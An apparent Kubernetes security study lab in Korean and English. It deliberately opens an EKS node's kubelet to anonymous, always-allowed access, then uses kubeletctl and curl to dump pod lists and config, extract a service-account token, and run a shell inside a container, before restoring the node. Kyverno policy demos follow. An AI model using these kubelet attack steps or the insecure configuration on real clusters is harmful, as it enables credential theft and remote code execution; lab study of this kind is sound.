(N/A:N/A) [root@myeks2-bastion-2 ~]# kubeletctl scan --cidr $N1/32
# 노드1에 kubelet API 호출 시도
(N/A:N/A) [root@myeks2-bastion-2 ~]# curl -k https://$N1:10250/pods; echo
Unauthorized
# 노드1 접속
ssh ec2-user@$N1
# 미흡한 인증/인가 설정으로 변경
sudo vi /etc/kubernetes/kubelet/kubelet-config.json
...
"authentication": {
"anonymous": {
"enabled": true
...
},
"authorization": {
"mode": "AlwaysAllow",
...
# kubelet restart
sudo systemctl restart kubelet
systemctl status kubelet
# 파드 목록 확인
curl -s -k https://$N1:10250/pods | jq
# kubelet-config.json 설정 내용 확인
(N/A:N/A) [root@myeks2-bastion-2 ~]# curl -k https://$N1:10250/configz | jq
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 3060 100 3060 0 0 517k 0 --:--:-- --:--:-- --:--:-- 597k
{
"kubeletconfig": {
"enableServer": true,
"syncFrequency": "1m0s",
"fileCheckFrequency": "20s",
"httpCheckFrequency": "20s",
"address": "0.0.0.0",
"port": 10250,
"tlsCipherSuites": [
"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256",
"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305",
"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305",
"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384",
"TLS_RSA_WITH_AES_256_GCM_SHA384",
"TLS_RSA_WITH_AES_128_GCM_SHA256"
],
...
"enableSystemLogHandler": true,
"enableSystemLogQuery": false,
"shutdownGracePeriod": "0s",
"shutdownGracePeriodCriticalPods": "0s",
"enableProfilingHandler": true,
"enableDebugFlagsHandler": true,
"seccompDefault": false,
"memoryThrottlingFactor": 0.9,
"registerNode": true,
"localStorageCapacityIsolation": true,
"containerRuntimeEndpoint": "unix:///run/containerd/containerd.sock"
}
}
# kubeletct 사용
# Return kubelet's configuration
(N/A:N/A) [root@myeks2-bastion-2 ~]# kubeletctl -s $N1 configz | jq
{
"kubeletconfig": {
"enableServer": true,
"syncFrequency": "1m0s",
"fileCheckFrequency": "20s",
"httpCheckFrequency": "20s",
"address": "0.0.0.0",
"port": 10250,
"tlsCipherSuites": [
"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256",
"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305",
"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305",
"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384",
"TLS_RSA_WITH_AES_256_GCM_SHA384",
"TLS_RSA_WITH_AES_128_GCM_SHA256"
],
"serverTLSBootstrap": true,
"authentication": {
"x509": {
"clientCAFile": "/etc/kubernetes/pki/ca.crt"
},
"webhook": {
"enabled": true,
"cacheTTL": "2m0s"
},
"anonymous": {
"enabled": true
}
},
"authorization": {
"mode": "AlwaysAllow",
"webhook": {
"cacheAuthorizedTTL": "5m0s",
"cacheUnauthorizedTTL": "30s"
}
},
"registryPullQPS": 5,
"registryBurst": 10,
"eventRecordQPS": 50,
"eventBurst": 100,
"enableDebuggingHandlers": true,
"healthzPort": 10248,
"healthzBindAddress": "127.0.0.1",
"oomScoreAdj": -999,
"clusterDomain": "cluster.local",
"clusterDNS": [
"10.100.0.10"
],
"streamingConnectionIdleTimeout": "4h0m0s",
"nodeStatusUpdateFrequency": "10s",
"nodeStatusReportFrequency": "5m0s",
"nodeLeaseDurationSeconds": 40,
"imageMinimumGCAge": "2m0s",
"imageGCHighThresholdPercent": 85,
"imageGCLowThresholdPercent": 80,
"volumeStatsAggPeriod": "1m0s",
"cgroupRoot": "/",
"cgroupsPerQOS": true,
"cgroupDriver": "systemd",
"cpuManagerPolicy": "none",
"cpuManagerReconcilePeriod": "10s",
"memoryManagerPolicy": "None",
"topologyManagerPolicy": "none",
"topologyManagerScope": "container",
"runtimeRequestTimeout": "2m0s",
"hairpinMode": "hairpin-veth",
"maxPods": 50,
"podPidsLimit": -1,
"resolvConf": "/etc/resolv.conf",
"cpuCFSQuota": true,
"cpuCFSQuotaPeriod": "100ms",
"nodeStatusMaxImages": 50,
"maxOpenFiles": 1000000,
"contentType": "application/vnd.kubernetes.protobuf",
"kubeAPIQPS": 50,
"kubeAPIBurst": 100,
"serializeImagePulls": false,
"evictionHard": {
"memory.available": "100Mi",
"nodefs.available": "10%",
"nodefs.inodesFree": "5%"
},
"evictionPressureTransitionPeriod": "5m0s",
"enableControllerAttachDetach": true,
"protectKernelDefaults": true,
"makeIPTablesUtilChains": true,
"iptablesMasqueradeBit": 14,
"iptablesDropBit": 15,
"featureGates": {
"RotateKubeletServerCertificate": true
},
"failSwapOn": true,
"memorySwap": {},
"containerLogMaxSize": "10Mi",
"containerLogMaxFiles": 5,
"configMapAndSecretChangeDetectionStrategy": "Watch",
"kubeReserved": {
"cpu": "70m",
"ephemeral-storage": "1Gi",
"memory": "442Mi"
},
"systemReservedCgroup": "/system",
"kubeReservedCgroup": "/runtime",
"enforceNodeAllocatable": [
"pods"
],
"volumePluginDir": "/usr/libexec/kubernetes/kubelet-plugins/volume/exec/",
"providerID": "aws:///ap-northeast-2a/i-0ba38cf4130566468",
"logging": {
"format": "text",
"flushFrequency": "5s",
"verbosity": 2,
"options": {
"json": {
"infoBufferSize": "0"
}
}
},
"enableSystemLogHandler": true,
"enableSystemLogQuery": false,
"shutdownGracePeriod": "0s",
"shutdownGracePeriodCriticalPods": "0s",
"enableProfilingHandler": true,
"enableDebugFlagsHandler": true,
"seccompDefault": false,
"memoryThrottlingFactor": 0.9,
"registerNode": true,
"localStorageCapacityIsolation": true,
"containerRuntimeEndpoint": "unix:///run/containerd/containerd.sock"
}
}
(N/A:N/A) [root@myeks2-bastion-2 ~]# kubeletctl -s $N1 pods
┌───────────────────────────────────────────────────────────────────────────────────────────────────────────┐
│ Pods from Kubelet │
├────┬──────────────────────────────────────────────────────┬─────────────┬──────────────────────────────┤
│ │ POD │ NAMESPACE │ CONTAINERS │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 1 │ aws-load-balancer-controller-64d7db49f7-8hd27 │ kube-system │ aws-load-balancer-controller │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 2 │ kube-prometheus-stack-operator-76bf64f57d-rjb5p │ monitoring │ kube-prometheus-stack │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 3 │ kube-prometheus-stack-prometheus-node-exporter-m74dv │ monitoring │ node-exporter │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 4 │ awscli-pod-5bdb44b5bd-9b99k │ default │ awscli-pod │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 5 │ eks-pod-identity-agent-cg64b │ kube-system │ eks-pod-identity-agent │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 6 │ aws-node-42pmp │ kube-system │ aws-node │
│ │ │ │ aws-eks-nodeagent │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 7 │ ebs-csi-controller-7d8bbc9b5d-sfpsm │ kube-system │ ebs-plugin │
│ │ │ │ csi-provisioner │
│ │ │ │ csi-attacher │
│ │ │ │ csi-snapshotter │
│ │ │ │ csi-resizer │
│ │ │ │ liveness-probe │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 8 │ ebs-csi-node-sghvh │ kube-system │ ebs-plugin │
│ │ │ │ node-driver-registrar │
│ │ │ │ liveness-probe │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 9 │ prometheus-kube-prometheus-stack-prometheus-0 │ monitoring │ prometheus │
│ │ │ │ config-reloader │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 10 │ myawscli │ default │ my-aws-cli │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 11 │ kube-proxy-fqnvd │ kube-system │ kube-proxy │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 12 │ coredns-55474bf7b9-rdvg4 │ kube-system │ coredns │
│ │ │ │ │
└────┴──────────────────────────────────────────────────────┴─────────────┴──────────────────────────────┘
# Scans for nodes with an open kubelet API > scans for all the tokens on a given node
(N/A:N/A) [root@myeks2-bastion-2 ~]# kubeletctl -s $N1 scan token
1. Pod: prometheus-kube-prometheus-stack-prometheus-0
Namespace: monitoring
Container: config-reloader
Url: https://192.168.1.231:10250/run/monitoring/prometheus-kube-prometheus-stack-prometheus-0/config-reloader
Output:
eyJhbGciOiJSUzI1NiIsImtpZCI6ImRiNmQ0MTNmZTdiM2JiMmRmNWE3ZWFmOGUyNTI2ZjNlNzJmODhkN2EifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIl0sImV4cCI6MTc0NDUwMzAyOSwiaWF0IjoxNzEyOTY3MDI5LCJpc3MiOiJodHRwczovL29pZGMuZWtzLmFwLW5vcnRoZWFzdC0yLmFtYXpvbmF3cy5jb20vaWQvRDNDMTg1MkFENzZCNEY3QUNCMzA1RTg0QzBFM0ZBRDUiLCJrdWJlcm5ldGVzLmlvIjp7Im5hbWVzcGFjZSI6Im1vbml0b3JpbmciLCJwb2QiOnsibmFtZSI6InByb21ldGhldXMta3ViZS1wcm9tZXRoZXVzLXN0YWNrLXByb21ldGhldXMtMCIsInVpZCI6ImY0Y2M0M2UwLTExZTItNGNhZS1iNzc5LWM1MTNiNTY1ZjNjOCJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoia3ViZS1wcm9tZXRoZXVzLXN0YWNrLXByb21ldGhldXMiLCJ1aWQiOiIyMGUxYWY4ZS1hYWI0LTRmMzQtOTE4YS05YTQ5NTgyMmI2MGYifSwid2FybmFmdGVyIjoxNzEyOTcwNjM2fSwibmJmIjoxNzEyOTY3MDI5LCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6bW9uaXRvcmluZzprdWJlLXByb21ldGhldXMtc3RhY2stcHJvbWV0aGV1cyJ9.XqSWGwvrk0pwaFa6crqgosHPu9cJUDJCuLN5iS8n4oYY8wed50LDzG8FyqPISSRlSTnB4o19owpr45cxyDjDMmD2eYeySoEwHfzc1uFVH6sfIEG156YNX2ctN5i0lV1_RYD3bBbnenF0lgvQKEpVmc1hkl_vKf1iB33GvLM5Q6li_NvGDHJR3teDnIctxtQcAKt0TWxLQei1w47EiUKeUKZ4m6YTDCFrmj2km3JAjk7khlqQqI_AgnCGaz3SfcqU0fX5Itl2LD70lodiX4NS3UxJ0hca0gQ24GD4KVPoRwEnMS1BVjmW1q_Auyq1bbBFZ3w3gSp0Az2zA3uQxEl5rA
╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ Decoded JWT token │
├───────────────┬─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤
│ KEY │ VALUE │
├───────────────┼────────────────────────────────────────────....
# 단, 아래 실습은 워커노드1에 myawscli 파드가 배포되어 있어야 실습이 가능. 물론 노드2~3에도 kubelet 수정하면 실습 가능함.
# kubelet API로 명령 실행 : <네임스페이스> / <파드명> / <컨테이너명>
curl -k https://$N1:10250/run/default/myawscli/my-aws-cli -d "cmd=aws --version"
# Scans for nodes with opened kubelet API > remote code execution on their containers
kubeletctl -s $N1 scan rce
# Run commands inside a container
(N/A:N/A) [root@myeks2-bastion-2 ~]# kubeletctl -s $N1 exec "/bin/bash" -n default -p myawscli -c my-aws-cli
bash-4.2#
--------------------------------
export
aws --version
aws ec2 describe-vpcs --region ap-northeast-2 --output table --no-cli-pager
exit
--------------------------------
# Return resource usage metrics (such as container CPU, memory usage, etc.)
kubeletctl -s $N1 metrics
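When the demo is done, it is worth putting node1 back to the secure defaults; this simply reverses the earlier edit:
# restore kubelet authentication/authorization on node1 and confirm anonymous access is rejected again
ssh ec2-user@$N1
sudo vi /etc/kubernetes/kubelet/kubelet-config.json # set anonymous.enabled back to false and authorization.mode back to Webhook
sudo systemctl restart kubelet
exit
curl -k https://$N1:10250/pods; echo # should return Unauthorized again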
Kyverno : k8s Native Policy Management - policies are ordinary Kubernetes resources, so they can be managed with familiar tools such as git and kustomize
How it works: runs as Dynamic Admission Control, hooking into mutating/validating admission to return an allow or deny result
설치 - HelmChart
# 설치
# EKS 설치 시 참고 https://kyverno.io/docs/installation/platform-notes/#notes-for-eks-users
# 모니터링 참고 https://kyverno.io/docs/monitoring/
## eks 는 kube-system 네임스페이스에 있는 리소스들이 kyverno 의 영향을 받지 않기 위해서 예외 처리를 해줘야함
cat << EOF > kyverno-value.yaml
config:
resourceFiltersExcludeNamespaces: [ kube-system ]
admissionController:
serviceMonitor:
enabled: true
backgroundController:
serviceMonitor:
enabled: true
cleanupController:
serviceMonitor:
enabled: true
reportsController:
serviceMonitor:
enabled: true
EOF
kubectl create ns kyverno
helm repo add kyverno https://kyverno.github.io/kyverno/
helm install kyverno kyverno/kyverno --version 3.2.0-rc.3 -f kyverno-value.yaml -n kyverno
# 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get all -n kyverno
NAME READY STATUS RESTARTS AGE
pod/kyverno-admission-controller-69665dff5-q79p8 1/1 Running 0 41s
pod/kyverno-background-controller-56bc88f4dc-bkt8w 1/1 Running 0 40s
pod/kyverno-cleanup-controller-64448c5b4d-p84l4 1/1 Running 0 41s
pod/kyverno-reports-controller-6bbd8f8d4-5sgfq 1/1 Running 0 41s
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
service/kyverno-background-controller-metrics ClusterIP 10.100.212.217 <none> 8000/TCP 42s
service/kyverno-cleanup-controller ClusterIP 10.100.41.225 <none> 443/TCP 42s
service/kyverno-cleanup-controller-metrics ClusterIP 10.100.228.26 <none> 8000/TCP 42s
service/kyverno-reports-controller-metrics ClusterIP 10.100.245.29 <none> 8000/TCP 42s
service/kyverno-svc ClusterIP 10.100.225.8 <none> 443/TCP 42s
service/kyverno-svc-metrics ClusterIP 10.100.61.117 <none> 8000/TCP 42s
NAME READY UP-TO-DATE AVAILABLE AGE
deployment.apps/kyverno-admission-controller 1/1 1 1 42s
deployment.apps/kyverno-background-controller 1/1 1 1 42s
deployment.apps/kyverno-cleanup-controller 1/1 1 1 42s
deployment.apps/kyverno-reports-controller 1/1 1 1 42s
NAME DESIRED CURRENT READY AGE
replicaset.apps/kyverno-admission-controller-69665dff5 1 1 1 41s
replicaset.apps/kyverno-background-controller-56bc88f4dc 1 1 1 41s
replicaset.apps/kyverno-cleanup-controller-64448c5b4d 1 1 1 41s
replicaset.apps/kyverno-reports-controller-6bbd8f8d4 1 1 1 41s
NAME SCHEDULE SUSPEND ACTIVE LAST SCHEDULE AGE
cronjob.batch/kyverno-cleanup-admission-reports */10 * * * * False 0 <none> 42s
cronjob.batch/kyverno-cleanup-cluster-admission-reports */10 * * * * False 0 <none> 42s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get crd | grep kyverno
admissionreports.kyverno.io 2024-04-13T00:25:27Z
backgroundscanreports.kyverno.io 2024-04-13T00:25:27Z
cleanuppolicies.kyverno.io 2024-04-13T00:25:27Z
clusteradmissionreports.kyverno.io 2024-04-13T00:25:27Z
clusterbackgroundscanreports.kyverno.io 2024-04-13T00:25:27Z
clustercleanuppolicies.kyverno.io 2024-04-13T00:25:27Z
clusterephemeralreports.reports.kyverno.io 2024-04-13T00:25:27Z
clusterpolicies.kyverno.io 2024-04-13T00:25:27Z
ephemeralreports.reports.kyverno.io 2024-04-13T00:25:27Z
globalcontextentries.kyverno.io 2024-04-13T00:25:27Z
policies.kyverno.io 2024-04-13T00:25:27Z
policyexceptions.kyverno.io 2024-04-13T00:25:27Z
updaterequests.kyverno.io 2024-04-13T00:25:27Z
# (Reference) Default certificates : https://kyverno.io/docs/installation/customization/#default-certificates
# Install step-cli : https://smallstep.com/docs/step-cli/installation/
wget https://dl.smallstep.com/cli/docs-cli-install/latest/step-cli_amd64.rpm
sudo rpm -i step-cli_amd64.rpm
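A quick check that the CLI installed correctly (a sketch):
step version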
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl -n kyverno get secret
NAME TYPE DATA AGE
kyverno-cleanup-controller.kyverno.svc.kyverno-tls-ca kubernetes.io/tls 2 2m26s
kyverno-cleanup-controller.kyverno.svc.kyverno-tls-pair kubernetes.io/tls 2 2m24s
kyverno-svc.kyverno.svc.kyverno-tls-ca kubernetes.io/tls 2 2m16s
kyverno-svc.kyverno.svc.kyverno-tls-pair kubernetes.io/tls 2 2m14s
sh.helm.release.v1.kyverno.v1 helm.sh/release.v1 1 2m39s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl -n kyverno get secret kyverno-svc.kyverno.svc.kyverno-tls-ca -o jsonpath='{.data.tls\.crt}' | base64 -d
-----BEGIN CERTIFICATE-----
MIIC7TCCAdWgAwIBAgIBADANBgkqhkiG9w0BAQsFADAYMRYwFAYDVQQDDA0qLmt5
dmVybm8uc3ZjMB4XDTI0MDQxMjIzMjU0OFoXDTI1MDQxMzAwMjU0OFowGDEWMBQG
A1UEAwwNKi5reXZlcm5vLnN2YzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC
ggEBAJ1G5mNXDmS0ziRUWWsF/v9EHYVhRYyqCyuogDNaPnG7xm0zdj6rML0wPe93
pP5nQ8tqhu0K88EAAASesHChYcCwY2Ad7OlekyiYsPg1wPkgy2yRYD9Oaey8b5Ta
svLxUYzEUofZCysSXAO5mxmEV5iOpoGYlaGNoZE8AGV7IbttZnSTa23ArLoE2zPS
hD6uyfgeMtOexPj24jTY+tvWg/L8H/ovqUh1sHZyfbhTIBFuVaqm4JZ6i+EDlKYi
H/3tfT3WS/kwuUX0Lkze/vTmT6M//HGBeeRkHM3ZQmQ+tszNY6g3oiGvifXIGmzO
5PlHYbDsGJLCPE/FkCS7A5ZlSwcCAwEAAaNCMEAwDgYDVR0PAQH/BAQDAgKkMA8G
A1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFASHCzD3XyqyQr1uNccmhsahxjdXMA0G
CSqGSIb3DQEBCwUAA4IBAQAZvTBOvepzw4y5ipPECVNN2xk7Qz7udRxxPjNRaQ5c
IKscK1qCHd8TynN72MT9zPKidt5YWwgDTfYPmbC32/rbPWsZVdmPPryWyGn5AtjE
r3UPMGFY7fespuOVmUYhrkTMUeedLXRhTUK86+27OkWyyqket9TUiqd/JnjOV8Xu
8snGlp0xGl0OnzqfCFEN1yC3fHbDpREAl846ZU2C26Wz6+ipmlHb9Ag+rDEocrh8
CdaelvGMfUQ8tV0I5TFxeD2qxRkvFZ/QJ2HnzDUjV/w3IaBjUioQc6v0D7CBf6XO
1/eudjiVCtiR1v0pX+IPavkbxtCQV0gvJHM0Ay47IOlb
-----END CERTIFICATE-----
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl -n kyverno get secret kyverno-svc.kyverno.svc.kyverno-tls-ca -o jsonpath='{.data.tls\.crt}' | base64 -d | step certificate inspect --short
X.509v3 Root CA Certificate (RSA 2048) [Serial: 0]
Subject: *.kyverno.svc
Issuer: *.kyverno.svc
Valid from: 2024-04-12T23:25:48Z
to: 2025-04-13T00:25:48Z
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get validatingwebhookconfiguration kyverno-policy-validating-webhook-cfg -o jsonpath='{.webhooks[0].clientConfig.caBundle}' | base64 -d | step certificate inspect --short
X.509v3 Root CA Certificate (RSA 2048) [Serial: 0]
Subject: *.kyverno.svc
Issuer: *.kyverno.svc
Valid from: 2024-04-12T23:25:48Z
to: 2025-04-13T00:25:48Z
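Since the two inspections above should show the same root CA, the webhook's caBundle can also be compared byte-for-byte with the CA stored in the secret (a sketch):
diff <(kubectl -n kyverno get secret kyverno-svc.kyverno.svc.kyverno-tls-ca -o jsonpath='{.data.tls\.crt}' | base64 -d) \
     <(kubectl get validatingwebhookconfiguration kyverno-policy-validating-webhook-cfg -o jsonpath='{.webhooks[0].clientConfig.caBundle}' | base64 -d) \
  && echo "caBundle matches the CA secret"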
Each rule consists of a match declaration, an optional exclude declaration, and one of a validate, mutate, generate, or verifyImages declaration.
Each rule may contain only a single validate, mutate, generate, or verifyImages sub-declaration.
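A minimal skeleton of this rule structure, with hypothetical policy and rule names, just to show where match, the optional exclude, and the single action declaration sit (the Validation, Mutation, and Generation examples below are concrete instances):
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: example-policy        # hypothetical name
spec:
  rules:
  - name: example-rule        # hypothetical name
    match:                    # which resources the rule selects
      any:
      - resources:
          kinds:
          - Pod
    exclude:                  # optional : resources to skip
      any:
      - resources:
          namespaces:
          - kube-system
    validate:                 # exactly one of validate / mutate / generate / verifyImages per rule
      message: "example message"
      pattern:
        metadata:
          labels:
            app: "?*"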
Validation
# Monitor
watch -d kubectl get pod -n kyverno
# Apply a ClusterPolicy
kubectl create -f- << EOF
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-labels
spec:
  validationFailureAction: Enforce
  rules:
  - name: check-team
    match:
      any:
      - resources:
          kinds:
          - Pod
    validate:
      message: "label 'team' is required"
      pattern:
        metadata:
          labels:
            team: "?*"  # note the wildcard : any non-empty value for 'team' is accepted
EOF
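For reference, the policy above sets validationFailureAction: Enforce, which blocks non-compliant requests at admission time; switching it to Audit would only record failures in PolicyReports. A sketch of that change (not applied here, since the Enforce behaviour is demonstrated next):
kubectl patch clusterpolicy require-labels --type merge -p '{"spec":{"validationFailureAction":"Audit"}}'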
# Verify
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get validatingwebhookconfigurations
NAME WEBHOOKS AGE
aws-load-balancer-webhook 3 12h
eks-aws-auth-configmap-validation-webhook 1 12h
kube-prometheus-stack-admission 1 12h
kyverno-cleanup-validating-webhook-cfg 1 9m
kyverno-exception-validating-webhook-cfg 1 8m50s
kyverno-global-context-validating-webhook-cfg 1 8m50s
kyverno-policy-validating-webhook-cfg 1 8m50s
kyverno-resource-validating-webhook-cfg 1 8m50s
kyverno-ttl-validating-webhook-cfg 1 9m
vpc-resource-validating-webhook 2 12h
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get ClusterPolicy
NAME ADMISSION BACKGROUND VALIDATE ACTION READY AGE MESSAGE
require-labels true true Enforce True 14s Ready
# Attempt to create a deployment (blocked by the policy)
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create deployment nginx --image=nginx
error: failed to create deployment: admission webhook "validate.kyverno.svc-fail" denied the request:
resource Deployment/default/nginx was blocked due to the following policies
require-labels:
autogen-check-team: 'validation error: label ''team'' is required. rule autogen-check-team
failed at path /spec/template/metadata/labels/team/'
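Because Kyverno auto-generates the rule for Pod controllers (the autogen-check-team rule in the error above), a Deployment is admitted only when its pod template carries the team label. A minimal sketch of a compliant manifest (not run in this walkthrough; nginx-ok is a hypothetical name):
kubectl create -f- << EOF
apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-ok
spec:
  replicas: 1
  selector:
    matchLabels:
      app: nginx-ok
  template:
    metadata:
      labels:
        app: nginx-ok
        team: backend   # satisfies require-labels via the autogen rule
    spec:
      containers:
      - name: nginx
        image: nginx
EOF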
# Create a pod with the required 'team' label
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl run nginx --image nginx --labels team=backend
pod/nginx created
# Verify
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get policyreport -o wide
NAME KIND NAME PASS FAIL WARN ERROR SKIP AGE
...
55d2d17a-4665-492d-b927-014d9e9bb4c8 Pod nginx 1 0 0 0 0 24s
...
# Query by report name
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get policyreport 55d2d17a-4665-492d-b927-014d9e9bb4c8 -o yaml | kubectl neat | yh
apiVersion: wgpolicyk8s.io/v1alpha2
kind: PolicyReport
metadata:
labels:
app.kubernetes.io/managed-by: kyverno
name: 55d2d17a-4665-492d-b927-014d9e9bb4c8
namespace: default
results:
- message: validation rule 'check-team' passed.
policy: require-labels
result: pass
rule: check-team
scored: true
source: kyverno
timestamp:
nanos: 0
seconds: 1712968590
scope:
apiVersion: v1
kind: Pod
name: nginx
namespace: default
uid: 55d2d17a-4665-492d-b927-014d9e9bb4c8
summary:
error: 0
fail: 0
pass: 1
skip: 0
warn: 0
# Delete the policy
kubectl delete clusterpolicy require-labels
Mutation
# Create the policy
kubectl create -f- << EOF
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: add-labels
spec:
  rules:
  - name: add-team
    match:
      any:
      - resources:
          kinds:
          - Pod
    mutate:
      patchStrategicMerge:
        metadata:
          labels:
            +(team): bravo
EOF
# Verify : +(team) is an "add if not present" anchor, so the team label is injected only when one is not already set
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get mutatingwebhookconfigurations
NAME WEBHOOKS AGE
aws-load-balancer-webhook 3 12h
kube-prometheus-stack-admission 1 12h
kyverno-policy-mutating-webhook-cfg 1 16m
kyverno-resource-mutating-webhook-cfg 1 16m
kyverno-verify-mutating-webhook-cfg 1 16m
pod-identity-webhook 1 12h
vpc-resource-mutating-webhook 1 12h
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get ClusterPolicy
NAME ADMISSION BACKGROUND VALIDATE ACTION READY AGE MESSAGE
add-labels true true Audit True 37s Ready
# Create pods and check their labels
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl run redis --image redis
pod/redis created
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get pod redis --show-labels
NAME READY STATUS RESTARTS AGE LABELS
redis 1/1 Running 0 7s run=redis,team=bravo
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl run newredis --image redis -l team=alpha
pod/newredis created
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get pod newredis --show-labels
NAME READY STATUS RESTARTS AGE LABELS
newredis 1/1 Running 0 10s team=alpha
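To preview the mutation without persisting another pod, a server-side dry run can be used, since dry-run requests still pass through the admission webhooks (a sketch; dryrun-redis is a hypothetical name, and this assumes the Kyverno webhook accepts dry-run requests, which it does by default):
kubectl run dryrun-redis --image redis --dry-run=server -o yaml | grep -B1 -A4 'labels:'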
Generation
# Create a secret
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl -n default create secret docker-registry regcred \
> --docker-server=myinternalreg.corp.com \
> --docker-username=john.doe \
> --docker-password=Passw0rd123! \
> --docker-email=john.doe@corp.com
secret/regcred created
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get secret regcred
NAME TYPE DATA AGE
regcred kubernetes.io/dockerconfigjson 1 19s
# Create the policy
kubectl create -f- << EOF
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: sync-secrets
spec:
  rules:
  - name: sync-image-pull-secret
    match:
      any:
      - resources:
          kinds:
          - Namespace
    generate:
      apiVersion: v1
      kind: Secret
      name: regcred
      namespace: "{{request.object.metadata.name}}"
      synchronize: true
      clone:
        namespace: default
        name: regcred
EOF
# Delete the earlier add-labels policy and verify that sync-secrets is ready
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl delete clusterpolicy add-labels
clusterpolicy.kyverno.io "add-labels" deleted
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get ClusterPolicy
NAME ADMISSION BACKGROUND VALIDATE ACTION READY AGE MESSAGE
sync-secrets true true Audit True 36s Ready
# Create a new namespace and check that the secret is cloned into it
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create ns mytestns
namespace/mytestns created
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl -n mytestns get secret
NAME TYPE DATA AGE
regcred kubernetes.io/dockerconfigjson 1 18s
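Since the policy sets synchronize: true, Kyverno's background controller keeps the clone in sync with the source and should recreate it if it is removed; a quick check (a sketch, the sleep only gives the controller time to react):
kubectl -n mytestns delete secret regcred
sleep 30 && kubectl -n mytestns get secret regcred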
# Delete the policy
kubectl delete clusterpolicy sync-secrets
Kyverno CLI
# Install the Kyverno CLI using the kubectl krew plugin manager
kubectl krew install kyverno
# test the Kyverno CLI
kubectl kyverno version
kubectl kyverno --help
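The CLI can also evaluate a policy against manifests offline, which is useful in CI before anything reaches the cluster; a sketch assuming require-labels.yaml and pod.yaml exist locally:
kubectl kyverno apply require-labels.yaml --resource pod.yaml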
# Clean up : delete the EKS cluster and its CloudFormation stack
eksctl delete cluster --name $CLUSTER_NAME && aws cloudformation delete-stack --stack-name $CLUSTER_NAME